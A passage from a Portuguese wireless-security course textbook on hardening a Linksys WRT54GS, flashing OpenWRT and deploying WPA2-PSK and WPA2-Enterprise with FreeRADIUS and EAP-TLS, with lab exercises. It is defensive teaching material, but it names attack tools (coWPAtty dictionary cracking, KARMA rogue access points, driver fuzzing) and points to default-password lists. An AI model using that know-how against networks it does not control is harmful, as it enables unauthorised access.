Esse Access Point foi lançado em 2004 e permite que se utilize todos os mecanismos de segurança disponíveis no mercado: WEP, WPA e WPA2 em modelo Personal (PSK) e Enterprise (com autenticação por 802.1x/RADIUS). O WRT54GS permite que se implante segurança reforçada com a presença de um servidor RADIUS externo, que atua como authentication server na arquitetura 802.1x. Entretanto, essas não são as únicas configurações relacionadas à segurança. Veremos, a seguir, como outras configurações, aparentemente administrativas, podem afetar a segu rança do dispositivo.

158

Figura 9.2 Tela do WRT54GS: configurações relacionadas à segurança.

Configurações de segurança
11 Secure Easy Setup (SES). 11 SSID. 11 Wireless SSID Broadcast. 11 Wireless MAC Filter. 11 AP isolation. A Linksys inclui, entre seus roteadores sem fio mais recentes, o recurso Secure Easy Setup (SES). Trata-se de um utilitário instalado, no cliente, associado a um botão no AP que, uma vez pressionado, configura de maneira automática uma rede WPA-PSK. Não trataremos dessa configuração, uma vez que está voltada justamente para quem não quer conhecer detalhes de redes sem fio. A seleção do Service Set Identifier (SSID) é importante, pois um SSID mal selecionado pode

q

AP atraente, considerando que pode indicar um AP com configuração padrão – SSID Linksys e com senha “admin” no caso do WRT54GS. Evite, também, escolher um SSID que diga algo sobre sua organização – salas, andares e departamentos. O broadcast do SSID pode ser desabilitado, de forma que somente quem conhecer o AP poderá se associar a ele. Essa “proteção” é de pouca utilidade para conter atacantes, uma vez que esse dado é divulgado em pacotes de associação e fácil de capturar. Outro recurso normalmente associado à segurança é o filtro de acesso por endereço MAC. Esse tipo de filtro pode conter um atacante menos experiente, mas não conterá aquele que forjar seu endereço MAC – algo feito facilmente tanto em plataformas Linux quanto Windows.

159

Capítulo 9 - Implantando uma WLAN segura (parte 1)

dar a um atacante informações importantes. O simples fato de não alterar o SSID já torna o

11 Firewall, filtros de aplicação e DMZ. 11 Administração: 22 Alteração de senha. 22 Habilitar HTTPS. 22 Habilitar ou desabilitar acesso administrativo a partir da rede sem fio. 22 Habilitar ou desabilitar gerenciamento a partir da interface externa. Esse AP implementa alguns conceitos de segurança de redes de maneira simplificada: 11 Firewall: filtros simplificados por origem, destino e portas; 11 Filtros de aplicação: filtros por palavras-chave e URL;

q

11 DMZ : possibilidade de expor um host diretamente à rede de distribuição, que pode ser a rede interna ou a internet, no caso do usuário doméstico. O acesso à interface de administração deve ser feito apenas por usuários autorizados e, para que isto aconteça, o AP implementa algumas medidas de controle de acesso. É importante alterar a senha de acesso remoto logo que se configura o AP. Senhas-padrão deste e de outros tipos de dispositivo de rede são facilmente encon tradas na web. Outra maneira de proteger o acesso administrativo é habilitar o servidor web com HTTPS e usar apenas esse protocolo de acesso. É possível, ainda, restringir ou permitir o acesso a estações ligadas à LAN do AP. De forma semelhante, é possível restringir ou permitir o acesso à interface administrativa a partir de hosts da rede cabeada à qual o AP está conectado. Por padrão, um AP como esse não possui nem mesmo a possibilidade de se escolher um usuário para o controle de acesso de HTTP – o que certamente permite ataques por força bruta. Quanto menor for a exposição da interface administrativa, melhor – especialmente em redes abertas.

Atualização de firmware
11 O AP também está sujeito a vulnerabilidades. 11 Pode ser encarada como atualização de segurança. 11 Feita a partir da LAN do AP e não por HTTPS. 11 Não pode haver queda de energia durante o processo. 11 Permite instalação de firmwares alternativos.

q

Tal como sua estação Windows, que precisa de atualizações de segurança do Sistema Opera cional (SO), de antivírus, do anti-spyware e de diversos outros componentes do sistema, um
Segurança em Redes sem Fio

AP também necessita de atualizações, estas que corrigem falhas ou adicionam funcionali dades – assim como foi o caso da implementação de WPA1 que tinha, como restrição, operar sobre o mesmo hardware de WEP. Atualizar o firmware deve ser encarado como uma tarefa rotineira de segurança, especial mente porque são frequentes as vulnerabilidades descobertas nesse tipo de dispositivo. Como exemplo, podemos citar o caso do próprio WRT54GS com firmware 4.50.6, que

160

apresentava uma vulnerabilidade que permitia que, mesmo definido o authentication type (menu “Wireless” > “Advanced Wireless Settings”) para Auto ou Shared, o AP se comportava como aberto – mesmo com WPA-PSK e TKIP habilitados. A possibilidade de atualizar firmware é particularmente interessante para a instalação de um firmware alternativo, como veremos mais adiante neste mesmo Capítulo.

Figura 9.3 Tela para atualização do firmware do WRT54GS.

AP mais seguro com OpenWRT
11 WRT54GS pode oferecer mais. 11 Um dos melhores APs SOHO em recursos de hardware. 11 Versão 3. 22 8 MB Flash, 32 MB RAM e processador de 200 MHz. 22 Outras versões e WRT54G: menos Flash, menos RAM. 11 É possível aproveitar melhor seus recursos. 11 Solução: Linux.

q

antigas. As séries WRT54G e GS ficaram conhecidas por terem tido seu código-fonte libe -

w
Conheça mais sobre o OpenWRT (Table of Hardware) e sobre os hardwares Linksys em “Linksys hardware notes”.

rado, satisfazendo às obrigações GNU GPL e permitindo o desenvolvimento de firmwares alternativos baseados em Linux. A partir da versão 5, lançada em abril de 2006, tanto a versão G como GS passaram a ter firmware baseado em VxWorks e tiveram sua memória flash reduzida a um tamanho insu ficiente para a instalação dos firmwares baseados em Linux. Uma nova série foi lançada (WRT54GL), que voltou a permitir a instalação de outros firmwares, com a desvantagem de oferecer apenas 4 MB e 16 MB de memória Flash e RAM, respectivamente. Esse modelo é basicamente um WRT54G versão 4 – que ainda permite a instalação de Linux.

161

Capítulo 9 - Implantando uma WLAN segura (parte 1)

Os Access Points da Linksys têm recursos de hardware abundantes em suas versões mais

OpenWRT
11 Firmware alternative. 11 Torna o AP um mini-PC com Linux. 11 Estende as funcionalidades do AP. 11 Compatível com vários equipamentos. 11 Não partiu do código-fonte do firmware original. Outras opções: 11 DD-WRT. 11 HyperWRT. OpenWRT é a opção mais interessante entre os firmwares alternativos disponíveis. Trans-

q

forma o AP em um mini PC com Linux, especialmente quando o dispositivo conta com mais memória Flash e RAM – como é o caso do WRT54GS versão 3. Esse firmware é compatível com diversos equipamentos, mas é nos modelos da Linksys que ele pode desenvolver melhor suas funcionalidades. Outras opções de firmware consagradas pelo uso, e mais voltadas para quem deseja uma interface gráfica mais rica, são DD-WRT e HyperWRT.

Vantagens do OpenWRT
11 Gerenciamento melhorado: SSH, SNMP e possibilidade de automações por scripts. 11 Mais parâmetros de configuração: nem tudo está na interface gráfica, ainda rudimentar. 11 Gerenciamento de pacotes: Snort, Drone Kismet, TCPdump, Nmap, RADIUS. 11 Arquitetura interna revelada. 11 Switch Ethernet, interface sem fio e chip do roteador que interliga. 11 Possibilidade de alterar a arquitetura interna.

q

O OpenWRT traz diversas vantagens, se for comparado com o firmware original da Linksys e até mesmo com outros firmwares baseados em Linux: 11 Gerenciamento: é possível gerenciar o AP a partir de um terminal SSH ou pela tradicional interface administrativa web. Além disso, lembre-se de que seu AP se torna um Linux, ou seja, é possível automatizar tarefas por meio de scripts; 11 Monitoração: é possível implantar facilmente SNMP e Syslog para monitoração do dispo sitivo – o que irá ajudar na resolução de problemas e na própria monitoração; 11 Interface gráfica: oferece apenas os serviços básicos, em um design rudimentar. Assim como em algumas aplicações Linux em computadores, tira-se mais do sistema na interface Command Line Interface (CLI);
Segurança em Redes sem Fio

11 RADIUS: um aspecto que diferencia essa distribuição de firmware das demais é a possi bilidade de instalação de pacotes, que vão desde Snort e Nmap até um servidor RADIUS – o que nos interessará, particularmente, no Capítulo 10. A possibilidade de RADIUS no próprio AP elimina a necessidade de um authentication server dedicado, facilitando a implantação de WPA e WPA2 Enterprise em ambientes mais modestos; 11 Linux : por meio de comandos comuns de Linux, como ifconfig, uname, iwconfig e brctl (para controlar bridges), é possível entender com mais detalhes a arquitetura interna do AP. Se não for suficiente, é possível alterar a arquitetura, segregando LAN e WLAN em VLANs distintas, por exemplo.

162

CPU
OpenWrt br0

WRT54G v4 WRT54GS v3

eth1
vlan0 vlan1

eth

WIFI Access Point

Tagging

eth0

Porta interna

Porta WAN

Portas LAN 1 2 3 4

Internet

Case Labels
Números de portas VLAN

5
Tagging
Figura 9.4 Arquitetura do WRT54GS.

4
vlan1

3

2

1

0

vlan0

Switch
Por intermédio do diagrama da Figura 9.4 e de comandos de administração típicos de Linux,

para Managed muda sua função para o cliente. Essa opção é interessante quando se deseja transformar o AP naquilo que se costuma chamar de “extensor” – um dispositivo que possui uma interface.

Instalação passo a passo
1. Verifique se seu AP é compatível:

q

11 WRT54G/GS v5.x não são compatíveis.
2. Escolha o firmware correto:

11 SquashFS é o recomendado.

163

Capítulo 9 - Implantando uma WLAN segura (parte 1)

Para mais informações sobre a arquitetura interna do AP, que varia conforme o fabricante e o modelo em questão, consulte a documentação de OpenWRT: OpenWRTdocs: Configuration 2. Network Configuration.

de uma interface de rede sem fio e de um processador que os conecta. A LAN que, w Ethernet, por padrão, engloba WLAN e LAN em bridge, passa a ser separada da WAN que, no contexto do AP, é o backbone ao qual ele é conectado. A LAN é representada pela interface vlan0 e a WAN, pela interface vlan1. A interface sem fio pode ser manipulada, tal como uma interface de uma estação Linux, pelo dispositivo eth1. Nesse ponto, lembre-se da configuração de uma estação Linux: o modo Master é o que confere ao dispositivo a funcionalidade de AP. Alterar o modo da interface de rede do AP

é possível entender a arquitetura interna do AP. No caso de WRT54GS, trata-se de um switch

3. Selecione o método de instalação:

q

11 HTTP. 22 Não utilize o modo HTTPS. 22 Conexão com AP por intermédio da interface LAN. 11 TFTP. A instalação do OpenWRT é simples, mas deve ser feita com muita cautela (não será reali zada nas práticas deste curso). Uma falha no procedimento pode ser o suficiente para um AP “bricked” – ou seja, inutilizável. A instalação começa com algo simples: determinar se o AP permite a instalação do OpenWRT, seja pelos recursos de memória necessários ou pela versão do hardware. Lembre-se de que os APs Linksys WRT54G/GS da versão 5 não permitem a instalação de OpenWRT até o momento. WRT54GS – a versão em que estamos nos baseando aqui – é compatível com OpenWRT. Uma vez determinada a compatibilidade, é hora de selecionar a versão que se deseja instalar. Existem diversas imagens de firmware disponíveis no site do OpenWRT, e aquela considerada como padrão está no diretório “bin” (“Index of /whiterussian/newest/”). A versão “micro” oferece quantidade reduzida de pacotes disponíveis logo após o flashing do firmware novo, inclusive sem interface gráfica administrativa. Devido aos recursos que temos no WRT54GS v3, essa opção não se faz necessária. A última etapa na escolha do firmware é decidir entre dois sistemas de arquivos: SquashFS ou JFFS2. Recomenda-se a utilização de SquashFS que, apesar de ser um filesystem que permite somente leitura, proporciona a impressão de um FS que permite escrita por meio de uma partição secundária JFFS2. Essa partição, que permite somente leitura, tem uma utilidade interessante: recuperar facilmente arquivos originais da instalação. Os modos de instalação mais comuns são pela interface web e por TFTP. É recomendado que se utilize este último modo, embora exija que a variável de boot_wait da NVRAM esteja ativada (boot_wait=on) – o que não constitui padrão em todos os equipamentos. Optaremos aqui pelo modo de instalação pela interface gráfica, um modo por meio do qual se obtém mais sucesso.

w
Mais informações sobre a instalação por TFTP podem ser obtidas em: Installing OpenWRT via TFTP.

164

Segurança em Redes sem Fio

Instalação do firmware pela interface administrativa web

Figura 9.5 Upload do firmware.

O modo de instalação por TFTP não é possível em todos os casos; por isso, ilustraremos a instalação através da interface web. Alguns cuidados devem ser tomados antes de efetuar o upload do firmware selecionado: 11 Certifique-se de que a fonte de energia esteja bem instalada e de que a energia esteja estável. Falta de energia durante o processo pode resultar em um AP “bricked”. 11 Conecte a estação ao AP por meio da rede cabeada, em uma das portas LAN disponíveis (não a porta WAN). Defina um endereço estático na mesma rede do endereço do AP (192.168.1.1) – 192.168.1.100 – com Subnet mask 255.255.255.0, por exemplo. 11 Certifique-se de que a conexão com a interface administrativa do AP não esteja sendo feita por meio da rede sem fio. A maneira mais simples de fazer isso é desabilitar a interface 802.11 da estação. 11 Certifique-se de que a conexão com o AP não esteja sendo feita com o servidor HTTPS do dispositivo. Se for o caso, habilite novamente HTTP. Uma vez seguidas todas estas recomendações, seu AP estará pronto para sofrer flashing. Em
Capítulo 9 - Implantando uma WLAN segura (parte 1)

seguida, pressione o botão “Upgrade” para prosseguir. A utilização dos LEDs é levemente alterada no OpenWRT. Dispositivos com o LED “DMZ” indicarão que o processo terminou, da seguinte forma: 11 O LED “Power” pisca e acende novamente no início do boot; 11 O processo de boot terá terminado quando o LED “DMZ” se apagar.

165

166

Segurança em Redes sem Fio

Roteiro de Atividades 9
11 Configuração pós-boot. 11 Configuração do AP por meio da interface web. 11 Configuração de uma WLAN WEP, WPA e WPA2 Personal (PSK). O objetivo deste Roteiro de Atividades é instalar um AP (configurado de maneira segura) para uma rede modelo Personal, baseada em uma chave pré-compartilhada (PSK) WEP, WPA ou WPA2, além das demais funcionalidades de segurança oferecidas pelo AP (MAC filters). Utilizaremos a interface web do firmware instalado pelo fabricante, e acompanharemos a configuração de um AP. É possível experimentar configurações pelo emulador da interface administrativa do Linksys WRT54G, disponível em: http://stevehorbachuk.com/linksys 11 Usuário: admin 11 Senha: admin No Capítulo 10, concluiremos o curso com conceitos de WPA2 (802.11i), 802.1x/RADIUS e Extensible Authentication Protocol (EAP), que serão seguidos por um upgrade no AP que será configurado com a implantação de uma WLAN em modelo Enterprise.

Atividade 9.1 – Configurações gerais de desempenho e segurança
Sempre que recebermos um novo AP, devemos verificar se a versão do firmware é a mais recente. O firmware é o “Sistema Operacional” do seu AP, muitas vezes uma distribuição Linux dedicada a gerenciar o AP. No caso de Linksys isso pode ser feito em: http://www.linksys.com/ Procure pela página do produto e pela opção firmware. Tenha em mãos os dados do hardware, disponíveis na etiqueta localizada na parte inferior do aparelho. Você deve procurar por modelo e versão do hardware (hardware version, h/w version).

Figura 9.6 Localização da etiqueta.

WRT54Gv5v6_1.02.5.002_fw.bin
A versão instalada no AP normalmente é exibida à direita, no topo da interface web. Se você constatar que a versão disponível é mais recente que a versão instalada em seu AP, faça a instalação. As configurações persistem depois da atualização do firmware, mas por segurança faça um backup em arquivo pela opção “Administration – Config Management”.

167

Capítulo 9 - Roteiro de Atividades

Exemplo de arquivo de firmware:

Antes de realizar o upload do firmware: 1. Conecte seu desktop em uma das portas Ethernet. Em hipótese alguma realize a atuali zação através de um link 802.11, porque não é seguro. Se esse processo for interrompido, existe a possibilidade de danos irreparáveis. 2. Configure um IP fixo no desktop, na mesma rede local do AP. Normalmente um IP como 192.168.1.100 é adequado. A atualização é muito importante. Existem versões que permitem, por exemplo, a confi guração de parâmetros de um AP sem a necessidade de senha. Assim, um usuário com o laptop associado ao AP é capaz de alterar a senha da interface administrativa e obter controle sobre a rede. Configurações adicionais: 11 Defina o time zone correto para que os logs sejam registrados adequadamente. Normal mente os APs sincronizam seu relógio automaticamente depois de ligados à internet com sucesso. Essa opção está disponível nos aparelhos Linksys em “Setup – Basic Setup”. Na aba “Administration”: 11 Altere a senha administrativa (muito importante). Existem diversas listas de senhas padrão disponíveis na internet. Uma das listas é a do grupo Phenoelit: http://www.phenoelit-us.org/dpl/dpl.html 11 Habilite somente HTTPS, se possível. Assim a captura da senha administrativa é dificultada. 11 Desabilite a opção “Wireless Access Web”. Dessa forma, o AP poderá ser administrado somente pela porta Ethernet, ou seja, é necessário o acesso físico. 11 Desabilite a opção “Remote Management”. Dessa forma você não permite que a administração seja feita a partir da interface WAN, que normalmente fica em contato com a internet. 11 Desabilite Universal Plug and Play (UPnP). 11 Em “Configurações adicionais wireless” (Wireless – Advanced Wireless Settings): se o AP tiver a opção “AP Isolation”, habilite-a. Essa opção impede a comunicação entre clientes associados ao AP, inibindo atividades maliciosas.

Atividade 9.2 – Configurando um AP com WPA ou WPA2 Personal
Nesta atividade, configuraremos um dos Access Points fornecidos pelo instrutor com um nível de segurança aceitável para redes pessoais e de pequenas empresas, navegando pela interface web de configuração. Configure o AP como WPA2 Personal, utilizando AES como protocolo de cifragem. Defina uma chave WPA2 compartilhada utilizando os critérios de segurança vistos durante o curso. Escolha uma senha robusta para evitar ataques de dicionários. Uma senha longa e que use
Segurança em Redes sem Fio

todos os caracteres ASCII (símbolos, números, maiúsculas, minúsculas) é sua única proteção. Verifique com o Kismet se a configuração está correta.

168

Atividade 9.3 – Configurações extras de segurança e desempenho
Em administração, altere o SSID default. Esse tipo de medida é especialmente importante para redes WPA Personal, já que o ataque depende do SSID. Valores padrão auxiliam o atacante. 11 Escolha um canal de frequência que não esteja sendo utilizado por outro AP, na área de alcance, com uma separação de canais o maior possível para os vizinhos. 11 Configure o AP para utilizar o MAC Filters. Coloque apenas a sua estação na lista de ende reços MAC permitidos e verifique a conexão. Verifique com um colega se um cliente com um MAC diferente consegue se conectar ao AP. 11 Desabilite o broadcast de SSID e verifique se houve perda de conectividade. Lembre-se de que essa não é uma medida de segurança, porque não oculta sua rede. Observe o que muda no tráfego quando este parâmetro é habilitado. 11 Desabilite os protocolos que não são necessários (ex.: IEEE 802.11b), caso todas as placas de sua rede utilizem 802.11g. Para melhor desempenho, configure a interface em modo 802.11b apenas (aba “Wireless – Basic Wireless Settings”). 11 Configure a potência do transmissor rádio em um valor suficiente para a área de cobertura desejada ou planejada em site survey. Um AP configurado de maneira segura não precisa ter seu sinal contido.

169

Capítulo 9 - Roteiro de Atividades

170

Segurança em Redes sem Fio

10
Implantando uma WLAN segura (parte 2)
objetivos
Apresentar conceitos de arquitetura de autenticação; mostrar conceitos de autenticação 802.1x e de sua implantação open source, além de FreeRADIUS; ensinar a implantação de uma WLAN segura baseada em RADIUS, WPA2 e EAP-TLS, bem como em método EAP e certificados digitais.

conceitos

EAP-TLS; FreeRADIUS; configuração WPA2 com RADIUS.

Introdução
No Capítulo 9, concluímos a instalação de um AP com WPA2-PSK, segurança suficiente para um usuário doméstico ou microempresa. Com essa implementação, não é necessária a instalação de um servidor de autenticação, além de estar disponível em qualquer AP comprado nos últimos dois anos. Embora WPA2-PSK sofra do mesmo problema de WEP, a necessidade de uma chave compartilhada torna superiores seus mecanismos de segurança.

Nível atual de segurança
AP configurado com WPA2-PSK. Vantagens: 11 Segurança suficiente para usuário doméstico. 22 Já existem ataques conhecidos contra WPA. 11 Não é necessário servidor de autenticação. 11 Possível mesmo sem OpenWRT. Desvantagens: 11 Chave compartilhada: mesma chave para todos os usuários, segredo mantido por pouco tempo. 11 Trocar PSK nos clientes é trabalhoso.

q
Capítulo 10 - Implantando uma WLAN segura (parte 2)

171

WPA foi criado pela Wi-Fi Alliance como resposta aos problemas de WEP. Para isso, intro duziu apenas parte (TKIP em vez de CCMP) do padrão 802.11i, que ainda estava em desen volvimento. Hoje, nem mesmo WPA-PSK, uma solução vigente para WEP até 2004, constitui garantia de segurança, pois ferramentas como coWPAtty são capazes de quebrar a chave pelo ataque de dicionário off-line. As desvantagens de WPA2 são as mesmas de qualquer sistema com senhas compartilhadas: o risco presente de vazamento para usuários não autorizados. Outro aspecto negativo do uso de PSK é a dificuldade de distribuição de chaves junto aos clientes, um processo manual e que dificulta a troca periódica de chaves.
Ataque de dicionário Consiste na cifragem das palavras de um dicionário e de comparações com os arquivos de senhas de usuários.

Arquitetura de autenticação
IEEE 802.1x – Port Based Network Access Control. Servidor de autenticação externo. 11 FreeRADIUS. 22 Implementação de RADIUS (RFC 2865). EAP-TLS como método EAP. 11 Extensible Authentication Protocol (EAP). 22 RFC 3748. 11 Necessidade de Infraestrutura de Chaves Públicas (ICP). 11 Necessidade de certificados no servidor RADIUS e nos clientes (autenticação mútua). Para que se implemente 802.11i em sua totalidade – o que também é conhecido como

q

Robust Secure Network (RSN) –, é preciso ir além de WPA-PSK. Para isso, introduzimos mais um elemento na infraestrutura: o servidor de autenticação 802.1x. O padrão 802.1x não define o tipo de servidor de autenticação backend que deve ser utili zado, mas RADIUS pode ser considerado o padrão “de fato”. Existem diversas implemen tações de RADIUS, mas trataremos apenas da opção open source FreeRADIUS. Com ele, é possível implantar RADIUS tanto como um servidor externo quanto no próprio AP. O 802.1x usa o protocolo Extensible Authentication Protocol (EAP), que permite diversos esquemas de autenticação: smart cards, Kerberos, chaves públicas, entre outros. O foco do curso está no método EAP-TLS, que usa os protocolos de autenticação otimizados, pro vidos pelo protocolo EAP para autenticação, para um esquema de segurança ainda mais seguro, quando associado com WPA2. O papel de Transport Layer Security (TLS), usado para diversas aplicações como web e e-mail, é o de prover autenticação mútua, negociação de algoritmos de criptografia com integridade protegida e troca de chaves entre cliente e servidor RADIUS, evitando ataques como man-in-the-middle. O EAP-TLS tem apenas uma desvantagem: a necessidade de uma Infraestrutura de Chaves Públicas (ICP), uma vez que é necessária a presença de certificados no servidor de autenticação e no suplicante.

172

Segurança em Redes sem Fio

Rede sem fio

Servidor de autenticação (RADIUS)

2

Au
1

thentica

t or

Figura 10.1 Arquitetura de autenticação de 802.1x.

Supplicant

3

Internet ou outros recursos LAN

1. Supplicant solicita ao Authenticator (AP) acesso à rede. AP solicita identificação  ao Supplicant. Neste ponto, apenas tráfego EAP é permitido. 2. Processo de autenticação tem início, utilizando EAP através de um túnel TLS. O Authenticator repassa as credenciais para o Authentication Server. 3. Caso a autenticação tenha sucesso, Supplicant obtém acesso ao recurso de rede. A arquitetura de autenticação de 802.1x é composta basicamente de três elementos: Supplicant, Authenticator e Authentication Server. O papel do Supplicant é exercido pelos clientes, o de Authenticator é exercido pelo AP e o de Authenticator Server, pelo servidor FreeRADIUS. Primeiro o Supplicant solicita ao Authenticator (AP) acesso à rede. Em seguida, o AP solicita as credenciais do Supplicant. Nesse ponto, apenas tráfego EAP (mais precisamente, EAP encapsulation over LAN EAPOL) é permitido entre Supplicant e Authenticator. Somente após esses passos o processo de autenticação é iniciado, utilizando EAP através de um túnel TLS. Finalmente, o Authenticator repassa as credenciais para o Authentication Server. Caso a autenticação tenha sucesso, Supplicant obtém acesso ao recurso de rede. É bom lembrar que a segurança da rede fica a cargo de WPA2 após a autenticação: 802.1x entra em ação somente nas autenticações inicial e periódicas (determinadas pelo AP) para garantir a troca segura de chaves. Outra observação importante é que o túnel TLS pode ser não formado diretamente entre cliente e Authentication Server (RADIUS): não aplicável quando é usado FreeRADIUS.
Capítulo 10 - Implantando uma WLAN segura (parte 2)

802.1x e FreeRADIUS
11 FreeRADIUS como Authentication Server. 11 Implementação open source de RADIUS para Unix. 11 Suporte a diversas fontes de autenticação. 22 Local (mais comum), /etc/passwd, LDAP, PAM, MySQL e outros SGBD.

q

173

11 Suporte a diversos tipos de métodos EAP: 22 EAP-TTLS. 22 EAP-TLS. 22 LEAP. 22 PEAP.

q

Por que EAP-TLS?
Autenticação mútua por certificados digitais, não sofre com vulnerabilidades na autenticação por túnel. 11 Ataques Man-in-the-Middle (MITM). A posse do certificado é condição para o acesso. Suporte a EAP-TLS nos principais Sistemas Operacionais. 11 Nativo: MAC OS X, Windows 2000 SP4, Windows XP, Windows Mobile 2003 e supe riores, Windows CE 4.2. 11 Utilitário wpa_supplicant: Linux e BSD.

q

Embora imponha a complexidade de se manter uma ICP (Infraestrutura de Chaves Públicas), EAP-TLS ainda é considerado um dos tipos de EAP mais seguros. Tanto clientes quanto servi dores de autenticação usam pares de chaves pública ou privada para autenticar usuários. Uma das vantagens desse tipo EAP é a falta de necessidade de um diretório de usuários: as credenciais do usuário passam a ser seu certificado e uma senha (opcional, dependendo da implantação). Assim, a tarefa de administrar usuários se concentra na ICP, a mesma usada para login na rede (single-sign-on), certificados para e-mail e outras aplicações. Para negar acesso a um usuário, basta que se revogue seu certificado, a tarefa de manutenção de uma Certificate Revogation List (CRL), parte de uma ICP estabelecida. Outro ponto positivo de EAP-TLS é o amplo suporte oferecido pelas principais plataformas de cliente, notadamente Linux, BSD e Windows.

Desvantagens de EAP-TLS
Depende de uma ICP bem implantada. 11 Recomendável para distribuição e gerenciamento adequados de chaves. 11 Smart cards tornam autenticação mais fácil para usuários. Divulgação de identidade nos certificados. 11 Certificados de Cliente e Servidor são transmitidos em texto claro. 11 Informações divulgadas sobre dispositivos, organização e sobre os próprios certificados. 11 Possibilidade de ataques de engenharia social.
Segurança em Redes sem Fio

q

Ter uma ICP bem implantada é condição básica para uma implantação bem-sucedida desse tipo de EAP. Armazenar os certificados na forma de smart cards pode ser uma opção inte ressante para tornar o uso de certificados mais simples para o usuário final. Essa tecnologia também diminui o risco de acesso indevido à rede, no caso de o atacante ter acesso a um cliente com certificado instalado. A necessidade de uma ICP não é exatamente uma desvan tagem de EAP-TLS, mas sim um fator que adiciona complexidade ao esquema de segurança que desencoraja muitas organizações a adotá-lo.

174

Esse esquema de segurança, entretanto, tem uma vulnerabilidade: divulgação de informações. Tanto o certificado do cliente quanto do servidor são enviados em texto claro, divulgando informações sobre os certificados. A posse dessas informações não é útil para um ataque à integridade das conexões, mas pode ajudar na coleta de informações que precedem um ataque de engenharia social. A transmissão de certificados em claro pela rede, embora pareça uma falha de segurança, é prática comum em protocolos de segurança consagrados, como SSL ou o próprio TLS. Na prática, não implantaremos uma ICP, uma vez que isso está fora do escopo do curso. Para demonstrar um cenário com WPA2 e EAP-TLS, serão gerados manualmente um par de certificados para o cliente e outro para o servidor, sem a presença de uma infraestrutura de distribuição de chaves conforme tipicamente encontrada em uma ICP.

Conclusão
WPA2 Enterprise com EAP-TLS. 11 Ainda é o mecanismo EAP mais seguro. 11 Pode ser associado a smart cards. 11 Controle do acesso à rede sem fio. 11 Tráfego cifrado entre cliente e AP. 22 Entre AP e rede de distribuição, depende da aplicação. Segurança tradicional nos clientes deve receber atenção. 11 Personal firewall, Antivírus, Anti-spyware e aplicação de correções de segurança. WPA2, por si só, ainda é um bom mecanismo de segurança, mesmo usado numa configu -

q

ração com chave compartilhada (WPA2-PSK). Embora esse nível de segurança seja suficiente para empresas no que diz respeito à integridade e confidencialidade dos dados trafegados, a autenticação se torna mais consistente quando WPA2 Enterprise é implementada em sua totalidade, com o uso de 802.1x e de uma arquitetura de autenticação. É bom lembrar que, uma vez conectado à rede, o cliente está sujeito aos mesmos problemas de segurança de estações da rede cabeada: worms, exploração de vulnerabilidades e spywares, entre outras ameaças existentes. É importante manter o sistema atualizado com as últimas versões e protegido com antivírus e anti-spyware atualizados, além de um firewall

Saiba mais: “Best EAP for an enterprise wireless LAN” e “Guidelines for Securing Wireless Local Area Networks (WLANs)” do National Institute of Standards and technology (NIST).

oferece tráfego cifrado apenas entre cliente e AP, ou seja, na rede cabeada (rede de distri buição) o tráfego pode ser observado. Para garantir tráfego cifrado até o destino, é possível usar um proxy com HTTPS ou um proxy sobre uma VPN (Virtual Private Network). Seu cliente pode estar seguro dentro do domínio da sua rede sem fio, mas não usando outras redes. Um exemplo de cenário possível seria aquele de um cliente conectado a um hotspot (Vex, T-Mobile etc.), que não implementa isolamento de tráfego entre os clientes, permitindo a propagação de worms e a exploração de vulnerabilidades por parte de outros clientes.

175

Capítulo 10 - Implantando uma WLAN segura (parte 2)

w Outra questão que deve ser considerada é que um AP com WPA2 e EAP-TLS implementados
pessoal bem configurado.

Cenário atual
11 Segurança no AP hoje é possível. 11 Novo alvo está nos clientes. 11 Ferramentas que se passam pela rede à qual o cliente quer se conectar, seja ela qual for: 22 Ferramenta KARMA, de Dino Dai Zovi. 22 802.11 Protocol Fuzzing. 33 Exploração de vulnerabilidades nos drivers das interfaces 802.11 – Black Hat 2006/DEFCON 14. 33 Firewall pessoal é irrelevante. 33 A atualização dos drivers da interface Wi-Fi é fundamental.

q

Do ponto de vista do AP, é possível dizer que as redes sem fio estão muito seguras. O novo alvo de ataques está em dispositivos Bluetooth (802.15.1) e em clientes Wi-Fi. Ferramentas como KARMA – disponível para Linux e compatível com interfaces de rede Atheros e driver MadWifi – permitem a simulação de qualquer rede com a qual um cliente queira se conectar. Dessa forma, se um cliente tenta se conectar a um AP com SSID “ESR”, KARMA simula uma rede com as mesmas características para levar o cliente a se conectar ao atacante. Uma vez conectado, o cliente pode fornecer dados interessantes para o atacante, como credenciais do servidor de e-mail IMAP/SMTP/POP, Instant Messaging (ICQ, Skype) ou serviços normalmente configurados para login automático por grande parte dos usuários. Outra oportunidade criada por um ataque desse tipo é a exploração de vulnerabilidades não corrigidas no cliente. Outro tipo de ataque que tem sido motivo de muita preocupação é o ataque ao driver da interface Wi-Fi. Isso é possível com uma técnica chamada fuzzing de protocolo que consiste em testar a interface com parâmetros não previstos pelo padrão IEEE 802.11. Campos do quadro de gerenciamento com mais conteúdo do que a especificação determina, entre outros casos de teste, podem causar buffer overflow, entre outros efeitos na interface Wi-Fi. Os pesquisadores Jon “Johnny Cache” Ellch e Dave Maynor divulgaram, superficialmente, nas conferências hacker Black Hat 2006 e DEFCON 14, parte de vulnerabilidades que afetam drivers de interfaces Wi-Fi em notebooks Apple. A demonstração da vulnerabilidade mostrava o pesquisador obtendo shell root remoto no cliente atacado no nível do driver; a presença de um firewall pessoal, nesse caso, demonstrou ser irrelevante. Os administradores de rede podem tirar algumas conclusões importantes: rede sem fio segura envolve também clientes com dispositivos tradicionais de segurança de rede e com drivers dos dispositivos atualizados.

176

Segurança em Redes sem Fio

Roteiro de Atividades 10
Atividade 10.1 – Autenticação RADIUS
Nesta atividade, configuraremos o AP e o cliente para utilização do protocolo WPA2 Enterprise. O protocolo 802.1x será usado para a autenticação através do método EAP-TLS. O servidor de autenticação remota será o FreeRADIUS, rodando sob um Linux Fedora Core 6, previamente instalado e configurado em nosso ambiente de laboratório. Os seguintes passos após a instalação do FreeRADIUS no servidor foram feitos: 11 Configuração da senha compartilhada com o AP; 11 Definição da porta que o servidor estará “escutando” (normalmente 1812); 11 Geração de certificados para cada aluno e servidor; 11 Definição das contas dos alunos e senhas a serem divulgadas pelo instrutor; 11 Instalação dos certificados no servidor e nos desktops. Essa pequena infraestrutura foi criada apenas para que os alunos tenham a oportunidade de trabalhar com esse tipo de configuração, considerada hoje uma das mais seguras. A implantação correta de EAP-TLS envolve uma Infraestrutura de Chaves Públicas (ICP), o que está fora do escopo deste curso.

Atividade 10.2 – Configuração do AP com WPA2 Enterprise
